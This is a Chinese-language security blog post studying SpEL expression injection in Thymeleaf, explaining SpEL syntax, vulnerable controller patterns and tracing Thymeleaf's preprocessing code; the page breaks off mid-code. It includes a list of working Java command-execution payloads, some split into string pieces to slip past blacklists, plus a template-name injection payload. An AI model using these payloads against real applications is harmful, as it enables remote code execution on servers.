<!DOCTYPE html>
<html lang="zh-CN">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="mayylu">



    <meta name="description" content="学习是一种生活态度">



<title>Thymeleaf SPEL表达式注入 | mayylu&#39;s blog</title>



    <link rel="icon" href="/vue.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 5.4.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">mayylu&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/categories">Categories</a>
                
                    <a class="menu-item" href="/tags">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">mayylu&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/categories">Categories</a>
                
                    <a class="menu-item" href="/tags">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    var tocbot_timer;
    var DEPTH_MAX = 6; // 为 6 时展开所有
    var tocbot_default_config = {
        tocSelector: '.tocbot-list',
        contentSelector: '.post-content',
        headingSelector: 'h1, h2, h3, h4, h5',
        orderedList: false,
        scrollSmooth: true,
        onClick: extend_click,
    };

    function extend_click() {
        clearTimeout(tocbot_timer);
        tocbot_timer = setTimeout(function() {
            tocbot.refresh(obj_merge(tocbot_default_config, {
                hasInnerContainers: true
            }));
        }, 420); // 这个值是由 tocbot 源码里定义的 scrollSmoothDuration 得来的
    }

    document.ready(function() {
        tocbot.init(obj_merge(tocbot_default_config, {
            collapseDepth: 1
        }));
    });

    function expand_toc() {
        var b = document.querySelector('.tocbot-toc-expand');
        var expanded = b.getAttribute('data-expanded');
        expanded ? b.removeAttribute('data-expanded') : b.setAttribute('data-expanded', true);
        tocbot.refresh(obj_merge(tocbot_default_config, {
            collapseDepth: expanded ? 1 : DEPTH_MAX
        }));
        b.innerText = expanded ? 'Expand all' : 'Collapse all';
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

    function obj_merge(target, source) {
        for (var item in source) {
            if (source.hasOwnProperty(item)) {
                target[item] = source[item];
            }
        }
        return target;
    }
</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">Thymeleaf SPEL表达式注入</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">mayylu</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">三月 18, 2026&nbsp;&nbsp;</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/java/">java</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>表达式我认为和jdbc，jndi一样，是由于java web设计模式导致的产物,一些中间件需要模板动态渲染，动态配置等功能就使用了表达式这个功能，但是对表达式的功能权限缺乏限制，就导致了表达式注入</p>
<p>好像java的生态就是容易出现这种漏洞，一个著名的开源组件用了另外一个更加底层的开源组件来实现一些功能，但是对这个底层组件的功能了解不全，错误的使用导致rce,爆出漏洞也只会写写黑名单，毕竟重新写一个底层组件太麻烦了又不是不能用</p>
<p>这里借着研究Thymeleaf漏洞学习一下 SPEL表达式注入漏洞，希望可以学习一下表达式注入这类漏洞的产生的背景，成因，和危害，而不是仅仅简单了解漏洞<br> <span id="more"></span></p>
<h2 id="SpEL表达式"><a href="#SpEL表达式" class="headerlink" title="SpEL表达式"></a>SpEL表达式</h2><p>SPEL语法提供了丰富的功能，如方法调用与字符串模板功能。这使得SPEL在构建复杂表达式、存取对象图属性、对象方法调用等方面具有强大的能力，极大地提高了开发的灵活性和效率<br>与EL 表达式简化 JSP 页面内的 Java 代码不同的是，SpEL表达式在spring中主要用于Bean 配置、注解参数设置、AOP 切面表达式等。</p>
<h3 id="用法"><a href="#用法" class="headerlink" title="用法"></a>用法</h3><h4 id="定界符"><a href="#定界符" class="headerlink" title="定界符"></a>定界符</h4><p>SpEL使用#{}作为定界符，即将#{}的内容当作spel表达式使用<br><code>&lt;property name=&quot;message&quot; value=&quot;Hello #&#123;T(java.time.LocalDateTime).now() &#125;&#125;&quot;/&gt;</code><br>当然spel表达式也支持字符拼接<br><code>&lt;property name=&quot;message&quot; value=&quot;#&#123; &#39;Hello &#39; + T(java.time.LocalDateTime).now() &#125;&quot;/&gt;</code><br><code>$&#123;&#125;</code>主要用于加载外部属性文件中的值<br>两者可以混合使用，但是必须<code>#&#123;&#125;</code>在外面，<code>$&#123;&#125;</code>在里面，如<code>#&#123;&#39;$&#123;&#125;&#39;&#125;</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Value(&quot;$&#123;app.name&#125;&quot;)</span></span><br><span class="line"><span class="keyword">private</span> String appName; <span class="comment">// 从配置文件读取值</span></span><br></pre></td></tr></table></figure>
<h4 id="基本语法"><a href="#基本语法" class="headerlink" title="基本语法"></a>基本语法</h4><h5 id="调用静态方法和属性"><a href="#调用静态方法和属性" class="headerlink" title="调用静态方法和属性"></a>调用静态方法和属性</h5><p>使用T(全限定类名)的形式调用静态方法和访问静态属性。<br><code>&lt;property name=&quot;random&quot; value=&quot;#&#123;T(java.lang.Math).random()&#125;&quot;/&gt;</code><br>唯一例外的是，SpEL内置了java.lang包下的类声明，也就是说java.lang.String可以通过T(String)访问，而不需要使用全限定名</p>
<h5 id="创建实例"><a href="#创建实例" class="headerlink" title="创建实例"></a>创建实例</h5><p>使用new可以直接在SpEL中创建实例</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Expression exp = parser.parseExpression(<span class="string">&quot;new java.lang.ProcessBuilder(&#x27;cmd&#x27;,&#x27;/c&#x27;,&#x27;calc&#x27;).start()&quot;</span>);</span><br></pre></td></tr></table></figure>
<h5 id="Bean引用"><a href="#Bean引用" class="headerlink" title="Bean引用"></a>Bean引用</h5><p>在 SpEL 表达式中，可以通过@符号引用 Spring 容器中的 Bean。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Value(&quot;#&#123;@myService.doSomething()&#125;&quot;)</span></span><br><span class="line"><span class="keyword">private</span> String result;</span><br></pre></td></tr></table></figure>
<p>这里@myService引用了 Spring 容器中名为myService的 Bean，并调用其doSomething方法。</p>
<h3 id="在spring开发中的应用"><a href="#在spring开发中的应用" class="headerlink" title="在spring开发中的应用"></a>在spring开发中的应用</h3><h4 id="在-Value-注解中使用"><a href="#在-Value-注解中使用" class="headerlink" title="在 @Value 注解中使用"></a>在 @Value 注解中使用</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">user</span> </span>&#123;</span><br><span class="line">    <span class="meta">@Value(&quot;$&#123;spring.user.username&#125;&quot;)</span><span class="comment">// 从配置文件读取值</span></span><br><span class="line">    <span class="keyword">private</span> String name;</span><br><span class="line"></span><br><span class="line">        <span class="meta">@Value(&quot;#&#123;systemProperties[&#x27;os.name&#x27;]&#125;&quot;)</span></span><br><span class="line">    <span class="keyword">private</span> String osName; <span class="comment">// 获取系统属性</span></span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> String <span class="title">getindex</span><span class="params">(Model model)</span></span></span><br><span class="line"><span class="function">  </span>&#123;</span><br><span class="line">    user user1=<span class="keyword">new</span> user(<span class="string">&quot;bigsai&quot;</span>,<span class="number">22</span>);</span><br><span class="line">    model.addAttribute(<span class="string">&quot;user&quot;</span>,user1);<span class="comment">//储存javabean</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;index&quot;</span>;<span class="comment">//与templates中index.html对应</span></span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>
<h4 id="在模板中嵌入逻辑"><a href="#在模板中嵌入逻辑" class="headerlink" title="在模板中嵌入逻辑"></a>在模板中嵌入逻辑</h4><figure class="highlight jsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;td th:text=<span class="string">&quot;$&#123;user.name&#125;&quot;</span>&gt;&lt;/td&gt;</span><br><span class="line">  &lt;td th:text=<span class="string">&quot;$&#123;user[&#x27;name&#x27;]&#125;&quot;</span>&gt;&lt;/td&gt;</span><br><span class="line">&lt;td th:text=<span class="string">&quot;$&#123;user.getname()&#125;&quot;</span>&gt;&lt;/td&gt;</span><br></pre></td></tr></table></figure>
<h4 id="在-XML-配置文件中使用"><a href="#在-XML-配置文件中使用" class="headerlink" title="在 XML 配置文件中使用"></a>在 XML 配置文件中使用</h4><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">bean</span> <span class="attr">id</span>=<span class="string">&quot;userService&quot;</span> <span class="attr">class</span>=<span class="string">&quot;com.example.UserService&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">property</span> <span class="attr">name</span>=<span class="string">&quot;defaultPageSize&quot;</span> <span class="attr">value</span>=<span class="string">&quot;#&#123;T(java.lang.Math).max(5, 10)&#125;&quot;</span>/&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">bean</span>&gt;</span></span><br></pre></td></tr></table></figure>
<h4 id="在代码块中直接使用表达式"><a href="#在代码块中直接使用表达式" class="headerlink" title="在代码块中直接使用表达式"></a>在代码块中直接使用表达式</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.springframework.expression.ExpressionParser;</span><br><span class="line"><span class="keyword">import</span> org.springframework.expression.spel.standard.SpelExpressionParser;</span><br><span class="line"><span class="keyword">import</span> org.springframework.expression.EvaluationContext;</span><br><span class="line"><span class="keyword">import</span> org.springframework.expression.spel.support.StandardEvaluationContext;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">SpelDemo</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> </span>&#123;</span><br><span class="line">        ExpressionParser parser = <span class="keyword">new</span> SpelExpressionParser();</span><br><span class="line">        EvaluationContext context = <span class="keyword">new</span> StandardEvaluationContext();</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 解析并执行表达式</span></span><br><span class="line">        String expression = <span class="string">&quot;&#x27;Hello &#x27; + &#x27;World!&#x27;&quot;</span>;</span><br><span class="line">        String result = parser.parseExpression(expression).getValue(context, String.class);<span class="comment">//在不指定EvaluationContext的情况下默认采用的是StandardEvaluationContext，而它包含了SpEL的所有功能，在允许用户控制输入的情况下可以成功造成任意命令执行</span></span><br><span class="line">        System.out.println(result); <span class="comment">// 输出: Hello World!</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3 id="常用payload与回显"><a href="#常用payload与回显" class="headerlink" title="常用payload与回显"></a>常用payload与回显</h3><p>其实可以看成java命令执行总结</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">T(java.lang.Runtime).getRuntime().exec(<span class="string">&#x27;calc&#x27;</span>)</span><br><span class="line"><span class="keyword">new</span> java.lang.ProcessBuilder(<span class="keyword">new</span> String[]&#123;<span class="string">&#x27;calc&#x27;</span>&#125;).start()</span><br><span class="line"><span class="comment">//反射调用</span></span><br><span class="line">T(String).getClass().forName(<span class="string">&#x27;java.lang.Runtime&#x27;</span>).getRuntime().exec(<span class="string">&#x27;calc&#x27;</span>)</span><br><span class="line">T(String).getClass().forName(<span class="string">&quot;java.l&quot;</span>+<span class="string">&quot;ang.Ru&quot;</span>+<span class="string">&quot;ntime&quot;</span>).getMethod(<span class="string">&quot;ex&quot;</span>+<span class="string">&quot;ec&quot;</span>,T(String[])).invoke(T(String).getClass().forName(<span class="string">&quot;java.l&quot;</span>+<span class="string">&quot;ang.Ru&quot;</span>+<span class="string">&quot;ntime&quot;</span>).getMethod(<span class="string">&quot;getRu&quot;</span>+<span class="string">&quot;ntime&quot;</span>).invoke(T(String).getClass().forName(<span class="string">&quot;java.l&quot;</span>+<span class="string">&quot;ang.Ru&quot;</span>+<span class="string">&quot;ntime&quot;</span>)),<span class="keyword">new</span> String[]&#123;<span class="string">&quot;cmd&quot;</span>,<span class="string">&quot;/C&quot;</span>,<span class="string">&quot;calc&quot;</span>&#125;)</span><br><span class="line"><span class="comment">//类加载</span></span><br><span class="line">T(java.lang.ClassLoader).getSystemClassLoader().loadClass(<span class="string">&#x27;java.lang.Runtime&#x27;</span>).getRuntime().exec(<span class="string">&#x27;calc&#x27;</span>)</span><br><span class="line"><span class="comment">//JavaScript引擎</span></span><br><span class="line">T(javax.script.ScriptEngineManager).newInstance().getEngineByName(<span class="string">&quot;nashorn&quot;</span>).eval(<span class="string">&quot;s=[3];s[0]=&#x27;cmd&#x27;;s[1]=&#x27;/C&#x27;;s[2]=&#x27;calc&#x27;;java.la&quot;</span>+<span class="string">&quot;ng.Run&quot;</span>+<span class="string">&quot;time.getRu&quot;</span>+<span class="string">&quot;ntime().ex&quot;</span>+<span class="string">&quot;ec(s);&quot;</span>)</span><br><span class="line">T(org.springframework.util.StreamUtils).copy(T(javax.script.ScriptEngineManager).newInstance().getEngineByName(<span class="string">&quot;JavaScript&quot;</span>).eval(<span class="string">&quot;xxx&quot;</span>),)</span><br><span class="line"><span class="comment">//回显构造</span></span><br><span class="line">#&#123;<span class="keyword">new</span> java.io.BufferedReader(<span class="keyword">new</span> java.io.InputStreamReader(<span class="keyword">new</span> ProcessBuilder(<span class="string">&quot;cmd&quot;</span>, <span class="string">&quot;/c&quot;</span>, <span class="string">&quot;whoami&quot;</span>).start().getInputStream(), <span class="string">&quot;GBK&quot;</span>)).readLine()&#125;</span><br><span class="line">#&#123;<span class="keyword">new</span> java.util.Scanner(<span class="keyword">new</span> java.lang.ProcessBuilder(<span class="string">&quot;cmd&quot;</span>, <span class="string">&quot;/c&quot;</span>, <span class="string">&quot;whoami&quot;</span>).start().getInputStream(), <span class="string">&quot;GBK&quot;</span>).useDelimiter(<span class="string">&quot;\\A&quot;</span>).next()&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>


<h2 id="Thymeleaf基础"><a href="#Thymeleaf基础" class="headerlink" title="Thymeleaf基础"></a>Thymeleaf基础</h2><p>Spring Boot默认是不支持JSP的,而是推荐使用Thymeleaf、Freemarker等模板引擎，默认情况下，如果你添加了 Thymeleaf 或 FreeMarker 的依赖，Spring Boot 将自动配置对应的模板引擎。<br>SpringBoot默认在static 目录中存放静态资源，而 templates 中放动态页面。<br>我们只需要把我们的html页面放在类路径下的templates下，thymeleaf就可以帮我们自动渲染了。</p>
<p>如果页面是Thymeleaf生成的就会在html上加上这样的标识<code>&lt;html xmlns:th=&quot;http://www.thymeleaf.org&quot;&gt;</code></p>
<h3 id="thymeleaf-表达式的简单使用"><a href="#thymeleaf-表达式的简单使用" class="headerlink" title="thymeleaf 表达式的简单使用"></a>thymeleaf 表达式的简单使用</h3><p>参考官方文档：<code>https://www.thymeleaf.org/doc/tutorials/3.1/usingthymeleaf.html#variables</code></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">    <span class="comment">//变量表达式： </span></span><br><span class="line">&lt;span th:text=<span class="string">&quot;$&#123;user.name&#125;&quot;</span>&gt;&lt;/span&gt;</span><br><span class="line">    <span class="comment">//选择变量表达式：</span></span><br><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">div</span> <span class="attr">th:object</span>=<span class="string">&quot;$&#123;user&#125;&quot;</span>&gt;</span></span></span><br><span class="line"><span class="xml">    <span class="tag">&lt;<span class="name">span</span> <span class="attr">th:text</span>=<span class="string">&quot;*&#123;name&#125;&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">span</span>&gt;</span></span></span><br><span class="line"><span class="xml"><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span></span><br><span class="line">    <span class="comment">//消息表达式：</span></span><br><span class="line">    <span class="xml"><span class="tag">&lt;<span class="name">span</span> <span class="attr">th:text</span>=<span class="string">&quot;#&#123;user.name&#125;&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">span</span>&gt;</span></span></span><br><span class="line">    <span class="comment">//链接 URL 表达式： </span></span><br><span class="line">    <span class="xml"><span class="tag">&lt;<span class="name">a</span> <span class="attr">th:href</span>=<span class="string">&quot;@&#123;/user/&#123;id&#125;(id=$&#123;user.id&#125;)&#125;&quot;</span>&gt;</span>详情<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span></span><br><span class="line">    <span class="comment">//片段表达式： </span></span><br><span class="line"><span class="comment">//layout.html</span></span><br><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">div</span> <span class="attr">th:fragment</span>=<span class="string">&quot;header&quot;</span>&gt;</span>Header内容<span class="tag">&lt;/<span class="name">div</span>&gt;</span></span></span><br><span class="line"><span class="comment">//页面</span></span><br><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">div</span> <span class="attr">th:replace</span>=<span class="string">&quot;~&#123;layout :: header&#125;&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<ol>
<li>其中只有变量表达式<code>$&#123;&#125;</code>和选择变量表达式<code>*&#123;&#125;</code>会将花括号里的内容当成spel表达式执行</li>
</ol>
<ol start="2">
<li><p>表达式内部可以嵌套变量表达式<br>但是只能当成参数，如<br><code>@&#123;/user/&#123;id&#125;(id=$&#123;user.id&#125;)&#125;</code>或者<code>~&#123;$&#123;fragment&#125;&#125;</code><br>如果想要自由拼接就需要使用预处理表达式<code>__ __</code><br><code>~&#123;layout :: div.__$&#123;className&#125;__&#125;</code><br>预处理是在正常表达式之前完成的表达式的执行，允许修改最终将执行的表达式。</p>
</li>
<li><p>表达式可以和字符串拼接</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;span th:text=<span class="string">&quot;&#x27;The name of the user is &#x27; + $&#123;user.name&#125;&quot;</span>&gt;</span><br><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">span</span> <span class="attr">th:text</span>=<span class="string">&quot;|The name of the user is $&#123;user.name&#125;|&quot;</span>&gt;</span></span></span><br></pre></td></tr></table></figure>
<p>可以通过<code>&#39;&#39; +</code>的方式拼接，也可以使用<code>||</code>来格式化输出</p>
</li>
</ol>
<h2 id="thymeleaf-SPEL注入"><a href="#thymeleaf-SPEL注入" class="headerlink" title="thymeleaf SPEL注入"></a>thymeleaf SPEL注入</h2><h3 id="注入点"><a href="#注入点" class="headerlink" title="注入点"></a>注入点</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//URL路径可控</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@Controller</span></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">ThymeleafDemoController</span> </span>&#123;</span><br><span class="line">    <span class="meta">@RequestMapping(&quot;/ThymeleafUri/&#123;path&#125;&quot;)</span></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">ThymeleafUri</span><span class="params">(<span class="meta">@PathVariable</span> String path)</span> </span>&#123;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//return内容可控</span></span><br><span class="line"><span class="meta">@Controller</span></span><br><span class="line">publicclassThymeleafDemoController&#123;</span><br><span class="line">    <span class="meta">@GetMapping(&quot;/path&quot;)</span></span><br><span class="line">    <span class="function">publicString <span class="title">path</span><span class="params">(String path)</span></span>&#123;</span><br><span class="line">        <span class="keyword">return</span><span class="string">&quot;user/&quot;</span>+ path +<span class="string">&quot;/welcome&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><p>payload:<br><code>__$&#123;T(java.lang.Runtime).getRuntime().exec(&quot;calc&quot;)&#125;__::</code><br>关于thymeleaf视图解析流程太复杂了，我这里直接展示最后解析表达式的部分</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//org.thymeleaf.spring5.view.ThymeleafView</span></span><br><span class="line"><span class="function"><span class="keyword">protected</span> <span class="keyword">void</span> renderFragment</span></span><br><span class="line"><span class="function"> <span class="title">if</span> <span class="params">(!viewTemplateName.contains(<span class="string">&quot;::&quot;</span>)</span>) </span>&#123; <span class="comment">//检测模板名中是否有::</span></span><br><span class="line">            templateName = viewTemplateName;</span><br><span class="line">            markupSelectors = <span class="keyword">null</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">final</span> IStandardExpressionParser parser = StandardExpressions.getExpressionParser(configuration);</span><br><span class="line"></span><br><span class="line">            <span class="keyword">final</span> FragmentExpression fragmentExpression;</span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">                fragmentExpression = (FragmentExpression) parser.parseExpression(context, <span class="string">&quot;~&#123;&quot;</span> + viewTemplateName + <span class="string">&quot;&#125;&quot;</span>);<span class="comment">//如有添加~&#123;&#125;并传入下一步</span></span><br><span class="line">            &#125;</span><br><span class="line">......</span><br><span class="line"><span class="comment">//org.thymeleaf.standard.expression.StandardExpressionPreprocessor</span></span><br><span class="line"><span class="keyword">final</span> <span class="class"><span class="keyword">class</span> <span class="title">StandardExpressionPreprocessor</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="keyword">char</span> PREPROCESS_DELIMITER = <span class="string">&#x27;_&#x27;</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> String PREPROCESS_EVAL = <span class="string">&quot;\\_\\_(.*?)\\_\\_&quot;</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> Pattern PREPROCESS_EVAL_PATTERN = Pattern.compile(PREPROCESS_EVAL, Pattern.DOTALL);</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">static</span> String <span class="title">preprocess</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">            <span class="keyword">final</span> IExpressionContext context,</span></span></span><br><span class="line"><span class="params"><span class="function">            <span class="keyword">final</span> String input)</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (input.indexOf(PREPROCESS_DELIMITER) == -<span class="number">1</span>) &#123;<span class="comment">//如果模板名不存在_直接返回</span></span><br><span class="line">            <span class="comment">// Fail quick</span></span><br><span class="line">            <span class="keyword">return</span> input;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">final</span> IStandardExpressionParser expressionParser = StandardExpressions.getExpressionParser(context.getConfiguration());</span><br><span class="line">        <span class="keyword">if</span> (!(expressionParser <span class="keyword">instanceof</span> StandardExpressionParser)) &#123;</span><br><span class="line">            <span class="keyword">return</span> input;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">final</span> Matcher matcher = PREPROCESS_EVAL_PATTERN.matcher(input);<span class="comment">//进行正则匹配，匹配__和__之间的内容</span></span><br><span class="line">        </span><br><span class="line">        <span class="keyword">if</span> (matcher.find()) &#123;</span><br><span class="line">            <span class="keyword">final</span> StringBuilder strBuilder = <span class="keyword">new</span> StringBuilder(input.length() + <span class="number">24</span>);</span><br><span class="line">            <span class="keyword">int</span> curr = <span class="number">0</span>;</span><br><span class="line">            <span class="keyword">do</span> &#123;</span><br><span class="line">                <span class="keyword">final</span> String previousText = </span><br><span class="line">                        checkPreprocessingMarkUnescaping(input.substring(curr,matcher.start(<span class="number">0</span>)));</span><br><span class="line">                <span class="keyword">final</span> String expressionText = </span><br><span class="line">                        checkPreprocessingMarkUnescaping(matcher.group(<span class="number">1</span>));<span class="comment">//提取__和__之间的内容</span></span><br><span class="line">                        </span><br><span class="line">                strBuilder.append(previousText);</span><br><span class="line">                </span><br><span class="line">                <span class="keyword">final</span> IStandardExpression expression =</span><br><span class="line">                        StandardExpressionParser.parseExpression(context, expressionText, <span class="keyword">false</span>);</span><br><span class="line">                <span class="keyword">if</span> (expression 